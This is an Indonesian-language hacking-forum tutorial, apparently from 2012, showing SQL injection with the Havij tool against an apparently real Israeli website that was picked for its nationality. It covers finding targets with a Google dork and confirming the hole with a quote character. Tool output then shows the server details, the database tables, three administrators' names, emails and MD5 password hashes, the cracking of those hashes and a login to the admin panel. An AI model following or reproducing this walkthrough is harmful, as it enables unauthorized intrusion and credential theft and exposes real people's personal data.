™NOT4Shared Inside Cheaters Community™
Would you like to react to this message? Create an account in a few clicks or log in to continue.


™NOT4Shared Inside Cheaters Community™ | N.4.S
 
VIP ForumIndeksN4Latest imagesPencarianPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» LostSaga Hack D3D Menu .
SQL Injection Memakai Havij  EmptySun Apr 08, 2012 1:11 pm by TukangSapu

» File PhpFox Nhe..!!!
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 11:23 pm by Admin

» Cara Hack Vbulliten
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 11:02 pm by Admin

» SQL Injection Memakai Havij
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 10:56 pm by Admin

» Tutorial dDOS For NEWBIE
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 10:53 pm by Admin

» Cara Membuat Nama Grup Kedap Kedip
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 10:05 pm by Admin

» Overlay Blueberry
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 10:02 pm by Admin

» Shoutbox 1.2.5 [FSNULL][3.2.3]
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 9:57 pm by Admin

»  Nhe Yang Cari File-File IPB Masuk ..!!!!
SQL Injection Memakai Havij  EmptySat Feb 25, 2012 9:53 pm by Admin

Register VIP N4
Barnner
Patner Forum

JAM


 

 SQL Injection Memakai Havij

Go down 
PengirimMessage
Admin
Admin
Admin
Admin


Jumlah posting : 38
Join date : 09.01.12
Age : 28
Lokasi : Palembang

SQL Injection Memakai Havij  Empty
PostSubyek: SQL Injection Memakai Havij    SQL Injection Memakai Havij  EmptySat Feb 25, 2012 10:56 pm

Download Tool Disini : [You must be registered and logged in to see this link.]

okeh kalo udah di download langsung aja ke tutorial nya :


gunakan dork apa saja


misal nya dork : inurl:index.php?page_id=


okeh berhubung tools ini buatan israel, saya akan Inject website milik israel juga !!!


Target :[indent][You must be registered and logged in to see this link.]
jangan lupa tambahkan ' , sehingga menjadi [You must be registered and logged in to see this link.]

Posted Image

sekarang kita jalankan Havij nya, copast target yg tadi ke kolom target pada Tools Havij

Posted Image

klik analyze


hasilnya:

Havij 1.10 ready!
Analyzing [You must be registered and logged in to see this link.]
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable Very Happy
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables

Posted Image

w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).

Posted Image

w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1

nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website [You must be registered and logged in to see this link.] sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan

Posted Image

Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya

Posted Image

w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan [You must be registered and logged in to see this link.] lalu klik start.... .... ............. Searching


Got that....
Page Found: [You must be registered and logged in to see this link.]

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access

Posted Image
Sekian ~
Kembali Ke Atas Go down
https://not4shared.forumid.net
 
SQL Injection Memakai Havij
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
™NOT4Shared Inside Cheaters Community™  :: ™NoT4Shared | Hacking And Cracking Activity :: Underground Site :: SQL Inject and Web Hack-
Navigasi: